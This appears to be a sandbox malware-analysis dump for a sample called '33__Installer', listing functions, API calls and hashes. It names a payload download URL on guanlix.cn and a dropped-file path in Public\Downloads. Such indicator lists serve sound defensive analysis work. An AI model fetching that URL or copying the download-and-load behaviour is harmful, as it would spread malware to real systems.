http://guanlix.cn:881/330.ccp, xrefs: 00C23A8F

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: Internet$File$CloseHandleReadVirtual_wprintf$AllocCount64OpenTick_rand$CreateFreeIos_base_dtorSizeSleep__time64std::ios_base::_
String ID: C:\Users\Public\Downloads\ind.jpg$http://guanlix.cn:881/330.ccp
API String ID: 1205071456-2177026270
Opcode ID: ffe0df1c19b644c0e43cf0ee955abd4b2ae51fbf52652e5e410c5ecb20803432
Instruction ID: 926d83fd0faa32d8d77e95790ea6ee014f83db9dfd717cc72a0155128d34031f
Opcode Fuzzy Hash: ffe0df1c19b644c0e43cf0ee955abd4b2ae51fbf52652e5e410c5ecb20803432
Instruction Fuzzy Hash: 41D017327D076062E6A173B03C0BFCD21109B28B92F140821FB41B99E699F4264162A9

Function 00C24638 Relevance: 4.6, APIs: 3, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xfsopen.LIBCPMT ref: 00C245F0
std::_Xfsopen.LIBCPMT ref: 00C2460C
_fseek.LIBCMT ref: 00C24623

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: Xfsopenstd::_$_fseek
String ID:
API String ID: 1675860589-0
Opcode ID: 06992a05de329eba3393e4587ee13203ca19278784d78dffb29bb7b723e32fc1
Instruction ID: 378e1085a0dac1553a010e1f79d0e673212680889934f5cf0529aed0ab2e14e9
Opcode Fuzzy Hash: 06992a05de329eba3393e4587ee13203ca19278784d78dffb29bb7b723e32fc1
Instruction Fuzzy Hash: 12118C32A04735A7DB2E4659BC02B7736C5AF01791F184030FEA6C5D91FE20CE118284

Function 00C27E8D Relevance: 4.6, APIs: 3, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getstream.LIBCMT ref: 00C27ED9

Part of subcall function 00C2AF3F: __getptd_noexit.LIBCMT ref: 00C2AF3F

@_EH4_CallFilterFunc@8.LIBCMT ref: 00C27F0F
__openfile.LIBCMT ref: 00C27F1F

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__openfile
String ID:
API String ID: 2808680356-0
Opcode ID: a8fbdfe8f0ec7bd7212733d6342f75ecad7e942157b25c992dd0d965c7798d1a
Instruction ID: db468cbad4fd9767eed44703ede09a0986cc4f4cecd2b0a88025f54ae19bc78b
Opcode Fuzzy Hash: a8fbdfe8f0ec7bd7212733d6342f75ecad7e942157b25c992dd0d965c7798d1a
Instruction Fuzzy Hash: D411ECB09192669FDB10BFF0ADC256E7BA5AF01310F174A78F420D7981D7384D4167A2

Function 00C23100 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fputc.LIBCMT ref: 00C23199

Strings

, xrefs: 00C2327D

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: _fputc
String ID:
API String ID: 4236582747-3916222277
Opcode ID: 0e5412a2e3e3088364d0e28a1ca6be10cd38730b90c06e52dc3d9279c6ae53b2
Instruction ID: 0d2c8c3824f155bcf21a626354abc0c1f8def39824ef94847bb1c08251d3c5f2
Opcode Fuzzy Hash: 0e5412a2e3e3088364d0e28a1ca6be10cd38730b90c06e52dc3d9279c6ae53b2
Instruction Fuzzy Hash: 97719572A01658DFCB24CF98E9809AEF7F5FB98710F10466EE91593B40DB35AE05CB50

Function 03CAFB37 Relevance: 3.2, APIs: 2, Instructions: 216
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 03CAFB8F
LoadLibraryA.KERNEL32(00000238), ref: 03CAFC2C

Memory Dump Source

Source File: 00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3ca0000_33__Installer.jbxd

Yara matches

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
Instruction ID: 45d6d885268b4062ab64a58f1334ba44da430f0f83925a7a972256ec1c12784b
Opcode Fuzzy Hash: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
Instruction Fuzzy Hash: 6761C172900F03ABCB32EFA98C90AABB7A9FF05218F19091DE65ACD450D735F251DB51

Function 00C26312 Relevance: 3.0, APIs: 2, Instructions: 32
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C2AF3F: __getptd_noexit.LIBCMT ref: 00C2AF3F

__lock_file.LIBCMT ref: 00C26359

Part of subcall function 00C25AF4: __lock.LIBCMT ref: 00C25B19

__fclose_nolock.LIBCMT ref: 00C26364

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 09dd413d31e5cd39d2309f93bbc8570ff58b9d4b8ee973cfcf9e3a746a8a55db
Instruction ID: a87eb2a828c5bbb0b852340755dc1d0efeb17087e3b4ff02279a2896fe332677
Opcode Fuzzy Hash: 09dd413d31e5cd39d2309f93bbc8570ff58b9d4b8ee973cfcf9e3a746a8a55db
Instruction Fuzzy Hash: A4F0B471811735DBD711EBB4B90276E7BA06F01330F258308E435AA8E1CBBC8A01BB66

Function 06177950 Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,06177912), ref: 061779FF

Memory Dump Source

Source File: 00000000.00000002.4106961310.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6170000_33__Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 4f32ff60d06357a020e37d94a13bbefff669746775f4f34c6278c0195bb69f53
Instruction ID: b69f0ba9e11abef75c6a4ee3cb8322d89027e029b7e03474fda446168f08fa27
Opcode Fuzzy Hash: 4f32ff60d06357a020e37d94a13bbefff669746775f4f34c6278c0195bb69f53
Instruction Fuzzy Hash: 3821A971C0425A9FCB10CFA9D4046DEFBF4EF48320F1485AAE484A7251E778A985CBE2

Function 00C21A10 Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C21A6A

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: a3ce1146190e77c9119a65bafe23c30523c48e3f6fe34d7c37c9e22ad0b6961b
Instruction ID: 453ccc3c6112e0a949969dda3073330da82530490b5fe3d3ba41b6dc40807807
Opcode Fuzzy Hash: a3ce1146190e77c9119a65bafe23c30523c48e3f6fe34d7c37c9e22ad0b6961b
Instruction Fuzzy Hash: 07214B75901368EFCB40CF69E88069D77B5EF58320F1981AAEC28CB642D774CE40AB90

Function 061774B0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,06177912), ref: 061779FF

Memory Dump Source

Source File: 00000000.00000002.4106961310.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6170000_33__Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 1b107fe27f6d534e643b10de3692d0a90cc86d2f1e5d1438dff0b2d1013b402c
Instruction ID: 5251b2053c2caea38760b6ab83a57d8011785f04aa4785aa655ebaafe8e15b18
Opcode Fuzzy Hash: 1b107fe27f6d534e643b10de3692d0a90cc86d2f1e5d1438dff0b2d1013b402c
Instruction Fuzzy Hash: 2B1144B1C002599BDB10CF9AC544BDEFBF4EB48324F14852AE818B7250D378A940CFE5

Function 06770108 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

LR^q, xrefs: 0677012D

Memory Dump Source

Source File: 00000000.00000002.4107305722.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_33__Installer.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 1388fdd18401a52bcf629943f74e2bfabf39c8d66cd78b360f898eb23020006e
Instruction ID: 844109605bf046611bb33c6b85e7cfa0cd466222d97d6f6f13c196a4437f832d
Opcode Fuzzy Hash: 1388fdd18401a52bcf629943f74e2bfabf39c8d66cd78b360f898eb23020006e
Instruction Fuzzy Hash: 3501A275F102056FDF94EAA488127BEBAE9EB84600F108069E509DB280FB709A0287D2

Function 06770007 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4107305722.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_33__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 664a726ee2051fd309d4998df4539402ec678c06bf3ec1047b264673617b8a80
Instruction ID: 2b1badd397414ad4db56119f8100f0dfef1c2fbf59b785d4aa401a576960553a
Opcode Fuzzy Hash: 664a726ee2051fd309d4998df4539402ec678c06bf3ec1047b264673617b8a80
Instruction Fuzzy Hash: 952128305043D09FC702AB7898143AE7FB9AF46310F14419AE495DB3E6DE6A4D56C7F2

Function 03CFD248 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4105718206.0000000003CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3cfd000_33__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ba44fd540acf24cd1c8168648747a45c246f1812f2dcc0845bbda840f31d315
Instruction ID: 6a2bd5826a487ee0810041abda7b24603178325dbafb5f656498d634e92221d2
Opcode Fuzzy Hash: 6ba44fd540acf24cd1c8168648747a45c246f1812f2dcc0845bbda840f31d315
Instruction Fuzzy Hash: 9421F871504200DFDB45DF14DAC8B1ABF65FB94314F2485A9DA0ACF25AC336E856C6A2

Function 03CFD243 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4105718206.0000000003CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3cfd000_33__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20a79bdc70fafdd4f01ac923dbc2bce50329bcf4eebf8cc04ff9bca8ffa494ba
Instruction ID: f90566e316ee3e1eed6a2bcce7b1b690000d261edecfebe626ea7a4d4b6ed12b
Opcode Fuzzy Hash: 20a79bdc70fafdd4f01ac923dbc2bce50329bcf4eebf8cc04ff9bca8ffa494ba
Instruction Fuzzy Hash: 4011B176504240CFDB16CF10D5C8B16BF71FB94324F28C5A9DA0A8F61AC336D55ACBA2

Function 06770040 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4107305722.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_33__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9cbc7425294250244541c2ca66c77e07799294e3208145c3ddf44ebbb84eee4
Instruction ID: 93748b058bb70b712b6b54d65a1218f912664160ddaad11ede72c4f8e18dde21
Opcode Fuzzy Hash: a9cbc7425294250244541c2ca66c77e07799294e3208145c3ddf44ebbb84eee4
Instruction Fuzzy Hash: 0001D670A10354DFDB45AB78990836E3EFAEB84300F204669A519973D8DF7689868BE1

Function 03CFD005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4105718206.0000000003CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3cfd000_33__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc8c7e4a8dddc474159870b05c73ee0553ba6bd49b32e9bea7752cef7cc0cea9
Instruction ID: ca3b0ccc7d3210e42443be067004bb2250cc12820992377098b48a72fee5d927
Opcode Fuzzy Hash: dc8c7e4a8dddc474159870b05c73ee0553ba6bd49b32e9bea7752cef7cc0cea9
Instruction Fuzzy Hash: 8901DB6240D3C09FD7128B258898B52BFB4EF53224F1D85DBD9898F1A7C2699849C762

Function 03CFD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4105718206.0000000003CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3cfd000_33__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b1746d3c607a25c05b3b245a87ae7618dff468cb82b1b54d130f3822c05fd80
Instruction ID: 8590a79cc9dff99cfbe7ddfae9eb8f5aee638bd6124cd3b11624f675de9e29ae
Opcode Fuzzy Hash: 7b1746d3c607a25c05b3b245a87ae7618dff468cb82b1b54d130f3822c05fd80
Instruction Fuzzy Hash: 5801A7714083409FE750CE26C988767FF98EF41324F1CC56AEE4ACF14AC6799985C6B1

Function 067701A1 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4107305722.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_33__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 562bafa64bbe91a0356cba348b558f4e3e91f2bb7b1120ca17eb15547e8dea9e
Instruction ID: a24edb92342c946199a6df891acd7dcc3d56d9f634efa60abdec6057c35e954c
Opcode Fuzzy Hash: 562bafa64bbe91a0356cba348b558f4e3e91f2bb7b1120ca17eb15547e8dea9e
Instruction Fuzzy Hash: 3C111EB6900348CFCB60DF9AD988BDEBBF0EB48324F208419D559A7210C334A984CFA5

Function 067701A8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4107305722.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6770000_33__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f05f24bbee6defa3f3108b0f846c1379392122c49ee4b7e50b319cdbc969082
Instruction ID: 49dc9c8f6c6778fc67801fb208875e07645e7cd1e1968aa54f841221f7111042
Opcode Fuzzy Hash: 8f05f24bbee6defa3f3108b0f846c1379392122c49ee4b7e50b319cdbc969082
Instruction Fuzzy Hash: D511F0B6900359CFCB60DF9AC988BDEBBF4EB48324F208459D559A7250C374A984CFA5

Non-executed Functions

Function 00C2FAAD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,00C300EA,?,00C2750F,?,000000BC,?,00000001,00000000,00000000), ref: 00C2FAEC
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,00C300EA,?,00C2750F,?,000000BC,?,00000001,00000000,00000000), ref: 00C2FB15
GetACP.KERNEL32(?,?,00C300EA,?,00C2750F,?,000000BC,?,00000001,00000000), ref: 00C2FB29

Strings

OCP, xrefs: 00C2FACD
ACP, xrefs: 00C2FABC

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 06af77320e8af1568ebf40e4d3f4828ecc712e45688f35c92b7d114475290832
Instruction ID: 6f7367e56246f119eca1abb987faa110ca19571a5f4021f55d5809e68c150be6
Opcode Fuzzy Hash: 06af77320e8af1568ebf40e4d3f4828ecc712e45688f35c92b7d114475290832
Instruction Fuzzy Hash: D901713160222FBBEB159B65FC16B9EB6B8AF01758F20403CF101E5990DBA0DF42E694

Function 00C26FE1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00C2E5E3
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C2E5F8
UnhandledExceptionFilter.KERNEL32(00C3AE50), ref: 00C2E603
GetCurrentProcess.KERNEL32(C0000409), ref: 00C2E61F
TerminateProcess.KERNEL32(00000000), ref: 00C2E626

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1bb00d7d53e451fa99890c2de61b471ff5ed67d7335a6ad65b35d17604762876
Instruction ID: 44d1550089c69567406f219357a037032060f74c9e388ae9f85d57ea42822fd0
Opcode Fuzzy Hash: 1bb00d7d53e451fa99890c2de61b471ff5ed67d7335a6ad65b35d17604762876
Instruction Fuzzy Hash: A921CEB84A63049FD7A5DF15F98974C3BB4FB0A300F204019EA09972B0E7F09980CF15

Function 061707A0 Relevance: 2.8, Strings: 2, Instructions: 260COMMON

Download Yara Rule

Strings

Xbq, xrefs: 061707CF
$^q, xrefs: 061707B6

Memory Dump Source

Source File: 00000000.00000002.4106961310.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6170000_33__Installer.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: f74d5da3047f094a2781520d04640a1d4401f913a32822705195165173c65184
Instruction ID: 4b0e7e01351105dd1fc77c20d709961f485a5ac94f6e8a20e57deb771c74c4c1
Opcode Fuzzy Hash: f74d5da3047f094a2781520d04640a1d4401f913a32822705195165173c65184
Instruction Fuzzy Hash: 71817074B002189FDB58AF79846867E7BB6BBC8711B158929E407E7398CF358C028B91

Function 00C2CD6D Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000CD2B), ref: 00C2CD72

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b61009ad2af8e6efc68facfa9387f95a159660e7952d5e5ba3e0770da241e4ae
Instruction ID: 3ef250e239037bb193619435f831bc37de8133c206e8e63da5deff1208c29488
Opcode Fuzzy Hash: b61009ad2af8e6efc68facfa9387f95a159660e7952d5e5ba3e0770da241e4ae
Instruction Fuzzy Hash: C39002B066111456470427706D8970D39919A5D602B420470A102C5455DAE081005653

Function 00C311B6 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: 2dd967434050f3d90c5895a5857393564ed0b178a6a91692edef521e4ab374a9
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: 44C19173D2A5F2498B75462E042823FEEA26EC1B4572FC391DCE43F58DC6236E1196D0

Function 00C30DCE Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: 993d5a76e18a69d4821aa1c430095aad9342c03e8c0b74d16804e877f404d2ed
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: D9C1A173D2A5F2498B35422E042823FEEA26E91B4572FC391DCE43F58DC623AE51D6D0

Function 00C309FC Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: c05f8cde1e78a3a29c978b19d6588b2dc975c894d6edc421191b272d25aa0dc3
Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: 42C19073D2A5F24A8B76462E142823FEEA16E81B4573FC391DCE43F58DC2236E1596D0

Function 00C3065E Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction ID: e225c87e34f2507c5826ea54012c799d6fcaf831b6eac19e571eb81dbfb24f10
Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction Fuzzy Hash: 33B16F33D2A5F2498B35862E042863FEE626EC1B4573FC395DCE43F58EC2266E1596D0

Function 06174B20 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4106961310.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6170000_33__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
